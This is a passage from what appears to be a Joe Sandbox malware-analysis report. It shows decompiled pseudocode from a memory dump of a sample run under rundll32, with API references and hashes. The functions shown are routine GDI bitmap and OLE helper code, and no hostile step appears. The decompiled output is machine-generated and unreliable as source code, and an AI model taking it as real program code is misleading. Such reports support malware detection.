				 *0x28657e8 = E027DE180("VarDateFromStr", E027DDE94, _t91);
				 *0x28657ec = E027DE180("VarCyFromStr", E027DDF00, _t91);
				 *0x28657f0 = E027DE180("VarBoolFromStr", E027DDF6C, _t91);
				 *0x28657f4 = E027DE180("VarBstrFromCy", E027DDFEC, _t91);
				 *0x28657f8 = E027DE180("VarBstrFromDate", E027DE05C, _t91);
				_t46 = E027DE180("VarBstrFromBool", E027DE0CC, _t91);
				 *0x28657fc = _t46;
				return _t46;
			}






                          0x027de1ba
                          0x027de1ce
                          0x027de1e4
                          0x027de1fa
                          0x027de210
                          0x027de226
                          0x027de23c
                          0x027de252
                          0x027de268
                          0x027de27e
                          0x027de294
                          0x027de2aa
                          0x027de2c0
                          0x027de2d6
                          0x027de2ec
                          0x027de302
                          0x027de318
                          0x027de32e
                          0x027de344
                          0x027de35a
                          0x027de370
                          0x027de386
                          0x027de396
                          0x027de39c
                          0x027de3a3

                          APIs
                          • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 027DE1B5
                            • Part of subcall function 027DE180: GetProcAddress.KERNEL32(00000000), ref: 027DE199
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                          • API String ID: 1646373207-1918263038
                          • Opcode ID: 2571017160ac2978639900fe9cd35b392694569a228bc5ca249851d9e471646b
                          • Instruction ID: 2076b30c9f888f3c64e6d242e7ddf4e64392cef18c76be39c6482a059678fb84
                          • Opcode Fuzzy Hash: 2571017160ac2978639900fe9cd35b392694569a228bc5ca249851d9e471646b
                          • Instruction Fuzzy Hash: 57416172B44209BBA21B6B6E744842B37FADB497113F2593AF4048F784DD31AC424A3E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027F8A88 Relevance: 37.7, APIs: 25, Instructions: 248windowCOMMON
                          Download Yara Rule
                          C-Code - Quality: 77%
                          			E027F8A88(struct HDC__* __eax, void* __ebx, int __ecx, int __edx, void* __edi, void* __esi, int _a4, int _a8, struct HDC__* _a12, int _a16, int _a20, int _a24, int _a28, struct HDC__* _a32, int _a36, int _a40) {
				int _v8;
				int _v12;
				char _v13;
				struct HDC__* _v20;
				void* _v24;
				void* _v28;
				long _v32;
				long _v36;
				struct HPALETTE__* _v40;
				intOrPtr* _t78;
				struct HPALETTE__* _t89;
				struct HPALETTE__* _t95;
				int _t171;
				intOrPtr _t178;
				intOrPtr _t180;
				struct HDC__* _t182;
				int _t184;
				void* _t186;
				void* _t187;
				intOrPtr _t188;

				_t186 = _t187;
				_t188 = _t187 + 0xffffffdc;
				_v12 = __ecx;
				_v8 = __edx;
				_t182 = __eax;
				_t184 = _a16;
				_t171 = _a20;
				_v13 = 1;
				_t78 =  *0x286478c; // 0x28630d4
				if( *_t78 != 2 || _t171 != _a40 || _t184 != _a36) {
					_v40 = 0;
					_v20 = E027F88E4(CreateCompatibleDC(0));
					_push(_t186);
					_push(0x27f8d08);
					_push( *[fs:eax]);
					 *[fs:eax] = _t188;
					_v24 = E027F88E4(CreateCompatibleBitmap(_a32, _t171, _t184));
					_v28 = SelectObject(_v20, _v24);
					_t89 =  *0x28658c8; // 0x570809f5
					_v40 = SelectPalette(_a32, _t89, 0);
					SelectPalette(_a32, _v40, 0);
					if(_v40 == 0) {
						_t95 =  *0x28658c8; // 0x570809f5
						_v40 = SelectPalette(_v20, _t95, 0xffffffff);
					} else {
						_v40 = SelectPalette(_v20, _v40, 0xffffffff);
					}
					RealizePalette(_v20);
					StretchBlt(_v20, 0, 0, _t171, _t184, _a12, _a8, _a4, _t171, _t184, 0xcc0020);
					StretchBlt(_v20, 0, 0, _t171, _t184, _a32, _a28, _a24, _t171, _t184, 0x440328);
					_v32 = SetTextColor(_t182, 0);
					_v36 = SetBkColor(_t182, 0xffffff);
					StretchBlt(_t182, _v8, _v12, _a40, _a36, _a12, _a8, _a4, _t171, _t184, 0x8800c6);
					StretchBlt(_t182, _v8, _v12, _a40, _a36, _v20, 0, 0, _t171, _t184, 0x660046);
					SetTextColor(_t182, _v32);
					SetBkColor(_t182, _v36);
					if(_v28 != 0) {
						SelectObject(_v20, _v28);
					}
					DeleteObject(_v24);
					_pop(_t178);
					 *[fs:eax] = _t178;
					_push(0x27f8d0f);
					if(_v40 != 0) {
						SelectPalette(_v20, _v40, 0);
					}
					return DeleteDC(_v20);
				} else {
					_v24 = E027F88E4(CreateCompatibleBitmap(_a32, 1, 1));
					_v24 = SelectObject(_a12, _v24);
					_push(_t186);
					_push(0x27f8b5b);
					_push( *[fs:eax]);
					 *[fs:eax] = _t188;
					MaskBlt(_t182, _v8, _v12, _a40, _a36, _a32, _a28, _a24, _v24, _a8, _a4, E027D6F5C(0xaa0029, 0xcc0020));
					_pop(_t180);
					 *[fs:eax] = _t180;
					_push(0x27f8d0f);
					_v24 = SelectObject(_a12, _v24);
					return DeleteObject(_v24);
				}
			}























                          0x027f8a89
                          0x027f8a8b
                          0x027f8a91
                          0x027f8a94
                          0x027f8a97
                          0x027f8a99
                          0x027f8a9c
                          0x027f8a9f
                          0x027f8aa3
                          0x027f8aab
                          0x027f8b64
                          0x027f8b73
                          0x027f8b78
                          0x027f8b79
                          0x027f8b7e
                          0x027f8b81
                          0x027f8b94
                          0x027f8ba4
                          0x027f8ba9
                          0x027f8bb8
                          0x027f8bc5
                          0x027f8bce
                          0x027f8be6
                          0x027f8bf5
                          0x027f8bd0
                          0x027f8bdf
                          0x027f8bdf
                          0x027f8bfc
                          0x027f8c1e
                          0x027f8c40
                          0x027f8c4d
                          0x027f8c5b
                          0x027f8c82
                          0x027f8ca7
                          0x027f8cb1
                          0x027f8cbb
                          0x027f8cc4
                          0x027f8cce
                          0x027f8cce
                          0x027f8cd7
                          0x027f8cde
                          0x027f8ce1
                          0x027f8ce4
                          0x027f8ced
                          0x027f8cf9
                          0x027f8cf9
                          0x027f8d07
                          0x027f8ac3
                          0x027f8ad5
                          0x027f8ae5
                          0x027f8aea
                          0x027f8aeb
                          0x027f8af0
                          0x027f8af3
                          0x027f8b2f
                          0x027f8b36
                          0x027f8b39
                          0x027f8b3c
                          0x027f8b4e
                          0x027f8b5a
                          0x027f8b5a

                          APIs
                          • CreateCompatibleBitmap.GDI32(?,00000001,00000001), ref: 027F8ACB
                          • SelectObject.GDI32(?,?), ref: 027F8AE0
                          • MaskBlt.GDI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,027F8B5B,?,?), ref: 027F8B2F
                          • SelectObject.GDI32(?,?), ref: 027F8B49
                          • DeleteObject.GDI32(?), ref: 027F8B55
                          • CreateCompatibleDC.GDI32(00000000), ref: 027F8B69
                          • CreateCompatibleBitmap.GDI32(?,?,?), ref: 027F8B8A
                          • SelectObject.GDI32(?,?), ref: 027F8B9F
                          • SelectPalette.GDI32(?,570809F5,00000000), ref: 027F8BB3
                          • SelectPalette.GDI32(?,?,00000000), ref: 027F8BC5
                          • SelectPalette.GDI32(?,00000000,000000FF), ref: 027F8BDA
                          • SelectPalette.GDI32(?,570809F5,000000FF), ref: 027F8BF0
                          • RealizePalette.GDI32(?), ref: 027F8BFC
                          • StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 027F8C1E
                          • StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,?,?,?,?,00440328), ref: 027F8C40
                          • SetTextColor.GDI32(?,00000000), ref: 027F8C48
                          • SetBkColor.GDI32(?,00FFFFFF), ref: 027F8C56
                          • StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 027F8C82
                          • StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 027F8CA7
                          • SetTextColor.GDI32(?,?), ref: 027F8CB1
                          • SetBkColor.GDI32(?,?), ref: 027F8CBB
                          • SelectObject.GDI32(?,00000000), ref: 027F8CCE
                          • DeleteObject.GDI32(?), ref: 027F8CD7
                          • SelectPalette.GDI32(?,00000000,00000000), ref: 027F8CF9
                          • DeleteDC.GDI32(?), ref: 027F8D02
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Select$ObjectPalette$ColorStretch$CompatibleCreateDelete$BitmapText$MaskRealize
                          • String ID:
                          • API String ID: 3976802218-0
                          • Opcode ID: 8fbcb78fcb96a928deae127a7a1b6d4f56c153b396b5cfb2a9064f703594cced
                          • Instruction ID: 871c877faec2f26c3c4130f9eedbd370ad0da5d60c4035b13895521e65b032ed
                          • Opcode Fuzzy Hash: 8fbcb78fcb96a928deae127a7a1b6d4f56c153b396b5cfb2a9064f703594cced
                          • Instruction Fuzzy Hash: 8D819FB2A04209AFDB91EFA8DD85FAF7BFDAB0C710F110559F618E7240C635AD018B61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027FC0C0 Relevance: 31.7, APIs: 21, Instructions: 194windowCOMMON
                          Download Yara Rule
                          C-Code - Quality: 79%
                          			E027FC0C0(void* __eax, long __ecx, struct HPALETTE__* __edx) {
				struct HBITMAP__* _v8;
				struct HDC__* _v12;
				struct HDC__* _v16;
				struct HDC__* _v20;
				char _v21;
				void* _v28;
				void* _v32;
				intOrPtr _v92;
				intOrPtr _v96;
				int _v108;
				int _v112;
				void _v116;
				int _t68;
				long _t82;
				void* _t117;
				intOrPtr _t126;
				intOrPtr _t127;
				long _t130;
				struct HPALETTE__* _t133;
				void* _t137;
				void* _t139;
				intOrPtr _t140;

				_t137 = _t139;
				_t140 = _t139 + 0xffffff90;
				_t130 = __ecx;
				_t133 = __edx;
				_t117 = __eax;
				_v8 = 0;
				if(__eax == 0 || GetObjectA(__eax, 0x54,  &_v116) == 0) {
					return _v8;
				} else {
					E027FB5B4(_t117);
					_v12 = 0;
					_v20 = 0;
					_push(_t137);
					_push(0x27fc2bb);
					_push( *[fs:eax]);
					 *[fs:eax] = _t140;
					_v12 = E027F88E4(GetDC(0));
					_v20 = E027F88E4(CreateCompatibleDC(_v12));
					_v8 = CreateBitmap(_v112, _v108, 1, 1, 0);
					if(_v8 == 0) {
						L17:
						_t68 = 0;
						_pop(_t126);
						 *[fs:eax] = _t126;
						_push(0x27fc2c2);
						if(_v20 != 0) {
							_t68 = DeleteDC(_v20);
						}
						if(_v12 != 0) {
							return ReleaseDC(0, _v12);
						}
						return _t68;
					} else {
						_v32 = SelectObject(_v20, _v8);
						if(_t130 != 0x1fffffff) {
							_v16 = E027F88E4(CreateCompatibleDC(_v12));
							_push(_t137);
							_push(0x27fc273);
							_push( *[fs:eax]);
							 *[fs:eax] = _t140;
							if(_v96 == 0) {
								_v21 = 0;
							} else {
								_v21 = 1;
								_v92 = 0;
								_t117 = E027FB9F8(_t117, _t133, _t133, 0,  &_v116);
							}
							_v28 = SelectObject(_v16, _t117);
							if(_t133 != 0) {
								SelectPalette(_v16, _t133, 0);
								RealizePalette(_v16);
								SelectPalette(_v20, _t133, 0);
								RealizePalette(_v20);
							}
							_t82 = SetBkColor(_v16, _t130);
							BitBlt(_v20, 0, 0, _v112, _v108, _v16, 0, 0, 0xcc0020);
							SetBkColor(_v16, _t82);
							if(_v28 != 0) {
								SelectObject(_v16, _v28);
							}
							if(_v21 != 0) {
								DeleteObject(_t117);
							}
							_pop(_t127);
							 *[fs:eax] = _t127;
							_push(0x27fc27a);
							return DeleteDC(_v16);
						} else {
							PatBlt(_v20, 0, 0, _v112, _v108, 0x42);
							if(_v32 != 0) {
								SelectObject(_v20, _v32);
							}
							goto L17;
						}
					}
				}
			}

























                          0x027fc0c1
                          0x027fc0c3
                          0x027fc0c9
                          0x027fc0cb
                          0x027fc0cd
                          0x027fc0d1
                          0x027fc0d6
                          0x027fc2cb
                          0x027fc0f0
                          0x027fc0f2
                          0x027fc0f9
                          0x027fc0fe
                          0x027fc103
                          0x027fc104
                          0x027fc109
                          0x027fc10c
                          0x027fc11b
                          0x027fc12c
                          0x027fc142
                          0x027fc149
                          0x027fc28d
                          0x027fc28d
                          0x027fc28f
                          0x027fc292
                          0x027fc295
                          0x027fc29e
                          0x027fc2a4
                          0x027fc2a4
                          0x027fc2ad
                          0x00000000
                          0x027fc2b5
                          0x027fc2ba
                          0x027fc14f
                          0x027fc15c
                          0x027fc165
                          0x027fc191
                          0x027fc196
                          0x027fc197
                          0x027fc19c
                          0x027fc19f
                          0x027fc1a6
                          0x027fc1c6
                          0x027fc1a8
                          0x027fc1a8
                          0x027fc1ae
                          0x027fc1c2
                          0x027fc1c2
                          0x027fc1d4
                          0x027fc1d9
                          0x027fc1e2
                          0x027fc1eb
                          0x027fc1f7
                          0x027fc200
                          0x027fc200
                          0x027fc20a
                          0x027fc22e
                          0x027fc238
                          0x027fc241
                          0x027fc24b
                          0x027fc24b
                          0x027fc254
                          0x027fc257
                          0x027fc257
                          0x027fc25e
                          0x027fc261
                          0x027fc264
                          0x027fc272
                          0x027fc167
                          0x027fc179
                          0x027fc27e
                          0x027fc288
                          0x027fc288
                          0x00000000
                          0x027fc27e
                          0x027fc165
                          0x027fc149

                          APIs
                          • GetObjectA.GDI32(?,00000054,?), ref: 027FC0E3
                          • GetDC.USER32(00000000), ref: 027FC111
                          • CreateCompatibleDC.GDI32(?), ref: 027FC122
                          • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 027FC13D
                          • SelectObject.GDI32(?,00000000), ref: 027FC157
                          • PatBlt.GDI32(?,00000000,00000000,?,?,00000042), ref: 027FC179
                          • CreateCompatibleDC.GDI32(?), ref: 027FC187
                          • SelectObject.GDI32(?), ref: 027FC1CF
                          • SelectPalette.GDI32(?,?,00000000), ref: 027FC1E2
                          • RealizePalette.GDI32(?), ref: 027FC1EB
                          • SelectPalette.GDI32(?,?,00000000), ref: 027FC1F7
                          • RealizePalette.GDI32(?), ref: 027FC200
                          • SetBkColor.GDI32(?), ref: 027FC20A
                          • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 027FC22E
                          • SetBkColor.GDI32(?,00000000), ref: 027FC238
                          • SelectObject.GDI32(?,00000000), ref: 027FC24B
                          • DeleteObject.GDI32 ref: 027FC257
                          • DeleteDC.GDI32(?), ref: 027FC26D
                          • SelectObject.GDI32(?,00000000), ref: 027FC288
                          • DeleteDC.GDI32(00000000), ref: 027FC2A4
                          • ReleaseDC.USER32(00000000,00000000), ref: 027FC2B5
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: ObjectSelect$Palette$CreateDelete$ColorCompatibleRealize$BitmapRelease
                          • String ID:
                          • API String ID: 332224125-0
                          • Opcode ID: cbc0bdfa33fea9602f879296f9c1a03dc762e020b7b8a739b3e5e4ca6ddd6350
                          • Instruction ID: fb6daa60fd5b031679403e4428277f12fd75e91f0c134e1000fd4698f9a8aa66
                          • Opcode Fuzzy Hash: cbc0bdfa33fea9602f879296f9c1a03dc762e020b7b8a739b3e5e4ca6ddd6350
                          • Instruction Fuzzy Hash: 59511B72E04209ABDB52EBF8DC59FAFB7BDEB08714F10445AB614E7280D7759940CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027FCEC8 Relevance: 28.4, APIs: 14, Strings: 2, Instructions: 351windowCOMMON
                          Download Yara Rule
                          C-Code - Quality: 79%
                          			E027FCEC8(intOrPtr __eax, void* __ebx, void* __ecx, intOrPtr* __edx, void* __edi, void* __esi, char* _a4) {
				intOrPtr _v8;
				intOrPtr* _v12;
				struct HDC__* _v16;
				struct HDC__* _v20;
				void* _v24;
				BITMAPINFOHEADER* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v37;
				struct HBITMAP__* _v44;
				void* _v48;
				struct HPALETTE__* _v52;
				struct HPALETTE__* _v56;
				intOrPtr* _v60;
				intOrPtr* _v64;
				short _v66;
				short _v68;
				signed short _v70;
				signed short _v72;
				void* _v76;
				intOrPtr _v172;
				char _v174;
				intOrPtr _t150;
				signed int _t160;
				intOrPtr _t164;
				signed int _t193;
				signed int _t218;
				signed short _t224;
				intOrPtr _t251;
				intOrPtr* _t255;
				intOrPtr _t261;
				intOrPtr _t299;
				intOrPtr _t300;
				intOrPtr _t305;
				signed int _t307;
				signed int _t327;
				void* _t329;
				void* _t330;
				signed int _t331;
				void* _t332;
				void* _t333;
				void* _t334;
				intOrPtr _t335;

				_t326 = __edi;
				_t333 = _t334;
				_t335 = _t334 + 0xffffff54;
				_t329 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_v52 = 0;
				_v44 = 0;
				_v60 = 0;
				 *((intOrPtr*)( *_v12 + 0xc))(__edi, __esi, __ebx, _t332);
				_v37 = _v36 == 0xc;
				if(_v37 != 0) {
					_v36 = 0x28;
				}
				_v28 = E027D277C(_v36 + 0x40c);
				_v64 = _v28;
				_push(_t333);
				_push(0x27fd3e5);
				_push( *[fs:edx]);
				 *[fs:edx] = _t335;
				_push(_t333);
				_push(0x27fd3b8);
				_push( *[fs:edx]);
				 *[fs:edx] = _t335;
				if(_v37 == 0) {
					 *((intOrPtr*)( *_v12 + 0xc))();
					_t330 = _t329 - _v36;
					_t150 =  *((intOrPtr*)(_v64 + 0x10));
					if(_t150 != 3 && _t150 != 0) {
						_v60 = E027D31DC(1);
						if(_a4 == 0) {
							E027D2C20( &_v174, 0xe);
							_v174 = 0x4d42;
							_v172 = _v36 + _t330;
							_a4 =  &_v174;
						}
						 *((intOrPtr*)( *_v60 + 0x10))();
						 *((intOrPtr*)( *_v60 + 0x10))();
						 *((intOrPtr*)( *_v60 + 0x10))();
						E027EDBA0(_v60,  *_v60, _v12, _t326, _t330, _t330, 0);
						 *((intOrPtr*)( *_v60 + 0x14))();
						_v12 = _v60;
					}
				} else {
					 *((intOrPtr*)( *_v12 + 0xc))();
					_t261 = _v64;
					E027D2C20(_t261, 0x28);
					_t251 = _t261;
					 *(_t251 + 4) = _v72 & 0x0000ffff;
					 *(_t251 + 8) = _v70 & 0x0000ffff;
					 *((short*)(_t251 + 0xc)) = _v68;
					 *((short*)(_t251 + 0xe)) = _v66;
					_t330 = _t329 - 0xc;
				}
				_t255 = _v64;
				 *_t255 = _v36;
				_v32 = _v28 + _v36;
				if( *((short*)(_t255 + 0xc)) != 1) {
					E027F87C4();
				}
				if(_v36 == 0x28) {
					_t224 =  *(_t255 + 0xe);
					if(_t224 == 0x10 || _t224 == 0x20) {
						if( *((intOrPtr*)(_t255 + 0x10)) == 3) {
							E027EDB30(_v12, 0xc, _v32);
							_v32 = _v32 + 0xc;
							_t330 = _t330 - 0xc;
						}
					}
				}
				if( *(_t255 + 0x20) == 0) {
					 *(_t255 + 0x20) = E027F8A54( *(_t255 + 0xe));
				}
				_t327 = _v37 & 0x000000ff;
				_t267 =  *(_t255 + 0x20) * 0;
				E027EDB30(_v12,  *(_t255 + 0x20) * 0, _v32);
				_t331 = _t330 -  *(_t255 + 0x20) * 0;
				if( *(_t255 + 0x14) == 0) {
					_t307 =  *(_t255 + 0xe) & 0x0000ffff;
					_t218 = E027F8A74( *((intOrPtr*)(_t255 + 4)), 0x20, _t307);
					asm("cdq");
					_t267 = _t218 * (( *(_t255 + 8) ^ _t307) - _t307);
					 *(_t255 + 0x14) = _t218 * (( *(_t255 + 8) ^ _t307) - _t307);
				}
				_t160 =  *(_t255 + 0x14);
				if(_t331 > _t160) {
					_t331 = _t160;
				}
				if(_v37 != 0) {
					E027F8D1C(_v32);
				}
				_v16 = E027F88E4(GetDC(0));
				_push(_t333);
				_push(0x27fd333);
				_push( *[fs:edx]);
				 *[fs:edx] = _t335;
				_t164 =  *((intOrPtr*)(_v64 + 0x10));
				if(_t164 == 0 || _t164 == 3) {
					if( *0x2863614 == 0) {
						_v44 = CreateDIBSection(_v16, _v28, 0,  &_v24, 0, 0);
						if(_v44 == 0 || _v24 == 0) {
							if(GetLastError() != 0) {
								E027DD158(_t255, _t267, _t327, _t331);
							} else {
								E027F87C4();
							}
						}
						_push(_t333);
						_push( *[fs:eax]);
						 *[fs:eax] = _t335;
						E027EDB30(_v12, _t331, _v24);
						_pop(_t299);
						 *[fs:eax] = _t299;
						_t300 = 0x27fd302;
						 *[fs:eax] = _t300;
						_push(0x27fd33a);
						return ReleaseDC(0, _v16);
					} else {
						goto L27;
					}
				} else {
					L27:
					_v20 = 0;
					_v24 = E027D277C(_t331);
					_push(_t333);
					_push(0x27fd29b);
					_push( *[fs:edx]);
					 *[fs:edx] = _t335;
					_t273 = _t331;
					E027EDB30(_v12, _t331, _v24);
					_v20 = E027F88E4(CreateCompatibleDC(_v16));
					_v48 = SelectObject(_v20, CreateCompatibleBitmap(_v16, 1, 1));
					_v56 = 0;
					_t193 =  *(_v64 + 0x20);
					if(_t193 > 0) {
						_t273 = _t193;
						_v52 = E027F8FD4(0, _t193);
						_v56 = SelectPalette(_v20, _v52, 0);
						RealizePalette(_v20);
					}
					_push(_t333);
					_push(0x27fd26f);
					_push( *[fs:edx]);
					 *[fs:edx] = _t335;
					_v44 = CreateDIBitmap(_v20, _v28, 4, _v24, _v28, 0);
					if(_v44 == 0) {
						if(GetLastError() != 0) {
							E027DD158(_t255, _t273, _t327, _t331);
						} else {
							E027F87C4();
						}
					}
					_pop(_t305);
					 *[fs:eax] = _t305;
					_push(0x27fd276);
					if(_v56 != 0) {
						SelectPalette(_v20, _v56, 0xffffffff);
					}
					return DeleteObject(SelectObject(_v20, _v48));
				}
			}














































                          0x027fcec8
                          0x027fcec9
                          0x027fcecb
                          0x027fced4
                          0x027fced6
                          0x027fced9
                          0x027fcede
                          0x027fcee3
                          0x027fcee8
                          0x027fcef8
                          0x027fceff
                          0x027fcf07
                          0x027fcf09
                          0x027fcf09
                          0x027fcf20
                          0x027fcf26
                          0x027fcf2b
                          0x027fcf2c
                          0x027fcf31
                          0x027fcf34
                          0x027fcf39
                          0x027fcf3a
                          0x027fcf3f
                          0x027fcf42
                          0x027fcf49
                          0x027fcfa8
                          0x027fcfab
                          0x027fcfb1
                          0x027fcfb7
                          0x027fcfd1
                          0x027fcfd8
                          0x027fcfe7
                          0x027fcfec
                          0x027fcffa
                          0x027fd006
                          0x027fd006
                          0x027fd016
                          0x027fd026
                          0x027fd03a
                          0x027fd049
                          0x027fd05b
                          0x027fd061
                          0x027fd061
                          0x027fcf4b
                          0x027fcf5b
                          0x027fcf5e
                          0x027fcf6a
                          0x027fcf6f
                          0x027fcf75
                          0x027fcf7c
                          0x027fcf83
                          0x027fcf8b
                          0x027fcf8f
                          0x027fcf8f
                          0x027fd064
                          0x027fd06a
                          0x027fd072
                          0x027fd07a
                          0x027fd07c
                          0x027fd07c
                          0x027fd085
                          0x027fd087
                          0x027fd08f
                          0x027fd09b
                          0x027fd0a8
                          0x027fd0ad
                          0x027fd0b1
                          0x027fd0b1
                          0x027fd09b
                          0x027fd08f
                          0x027fd0b8
                          0x027fd0c3
                          0x027fd0c3
                          0x027fd0c9
                          0x027fd0d5
                          0x027fd0de
                          0x027fd0f0
                          0x027fd0f6
                          0x027fd0f8
                          0x027fd104
                          0x027fd10e
                          0x027fd113
                          0x027fd116
                          0x027fd116
                          0x027fd119
                          0x027fd11e
                          0x027fd120
                          0x027fd120
                          0x027fd126
                          0x027fd12b
                          0x027fd12b
                          0x027fd13c
                          0x027fd141
                          0x027fd142
                          0x027fd147
                          0x027fd14a
                          0x027fd150
                          0x027fd155
                          0x027fd163
                          0x027fd2b9
                          0x027fd2c0
                          0x027fd2cf
                          0x027fd2d8
                          0x027fd2d1
                          0x027fd2d1
                          0x027fd2d1
                          0x027fd2cf
                          0x027fd2df
                          0x027fd2e5
                          0x027fd2e8
                          0x027fd2f3
                          0x027fd2fa
                          0x027fd2fd
                          0x027fd31c
                          0x027fd31f
                          0x027fd322
                          0x027fd332
                          0x00000000
                          0x00000000
                          0x00000000
                          0x027fd169
                          0x027fd169
                          0x027fd16b
                          0x027fd175
                          0x027fd17a
                          0x027fd17b
                          0x027fd180
                          0x027fd183
                          0x027fd189
                          0x027fd18e
                          0x027fd1a1
                          0x027fd1bb
                          0x027fd1c0
                          0x027fd1c6
                          0x027fd1cb
                          0x027fd1cd
                          0x027fd1d9
                          0x027fd1eb
                          0x027fd1f2
                          0x027fd1f2
                          0x027fd1f9
                          0x027fd1fa
                          0x027fd1ff
                          0x027fd202
                          0x027fd21b
                          0x027fd222
                          0x027fd22b
                          0x027fd234
                          0x027fd22d
                          0x027fd22d
                          0x027fd22d
                          0x027fd22b
                          0x027fd23b
                          0x027fd23e
                          0x027fd241
                          0x027fd24a
                          0x027fd256
                          0x027fd256
                          0x027fd26e
                          0x027fd26e

                          APIs
                          • GetDC.USER32(00000000), ref: 027FD132
                          • CreateCompatibleDC.GDI32(00000001), ref: 027FD197
                          • CreateCompatibleBitmap.GDI32(00000001,00000001,00000001), ref: 027FD1AC
                          • SelectObject.GDI32(?,00000000), ref: 027FD1B6
                          • SelectPalette.GDI32(?,?,00000000), ref: 027FD1E6
                          • RealizePalette.GDI32(?), ref: 027FD1F2
                          • CreateDIBitmap.GDI32(?,?,00000004,00000000,?,00000000), ref: 027FD216
                          • GetLastError.KERNEL32(?,?,00000004,00000000,?,00000000,00000000,027FD26F,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 027FD224
                          • SelectPalette.GDI32(?,00000000,000000FF), ref: 027FD256
                          • SelectObject.GDI32(?,?), ref: 027FD263
                          • DeleteObject.GDI32(00000000), ref: 027FD269
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Select$CreateObjectPalette$BitmapCompatible$DeleteErrorLastRealize
                          • String ID: ($BM
                          • API String ID: 2831685396-2980357723
                          • Opcode ID: 9a22edad3cb5c9c86f959ec9025b7a29045a6b87bd93ae57dac1670e20c961b1
                          • Instruction ID: d8a3e3a9a3fe25f5326afcf9618d6b995faddfd0b870f91bd5631c1b2b199197
                          • Opcode Fuzzy Hash: 9a22edad3cb5c9c86f959ec9025b7a29045a6b87bd93ae57dac1670e20c961b1
                          • Instruction Fuzzy Hash: 3DD13875A042089FDF55EFA8C898BAEBBB6FF49314F048469EA04EB354D7349841CF61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 028028B8 Relevance: 25.0, APIs: 11, Strings: 3, Instructions: 454windowCOMMON
                          Download Yara Rule
                          C-Code - Quality: 89%
                          			E028028B8(intOrPtr __eax, void* __ebx, signed char __ecx, char __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				intOrPtr _v8;
				char _v9;
				signed int _v11;
				intOrPtr* _v16;
				int _v20;
				int _v24;
				int _v28;
				int _v32;
				int _v36;
				int _v40;
				signed int _v44;
				int _v48;
				signed int _v52;
				intOrPtr _v56;
				signed int _v60;
				intOrPtr _v64;
				char _v65;
				char _v66;
				intOrPtr* _v72;
				intOrPtr* _v76;
				intOrPtr* _v80;
				intOrPtr* _v84;
				struct tagRECT _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				intOrPtr _t206;
				intOrPtr* _t220;
				int _t223;
				signed int _t227;
				void* _t231;
				CHAR* _t234;
				signed int _t242;
				intOrPtr* _t253;
				signed int _t258;
				intOrPtr* _t261;
				signed int _t266;
				intOrPtr* _t269;
				signed int _t298;
				signed int _t299;
				intOrPtr _t323;
				void* _t341;
				signed int _t355;
				signed int _t360;
				CHAR* _t367;
				int _t378;
				void* _t379;
				void* _t380;
				void* _t381;
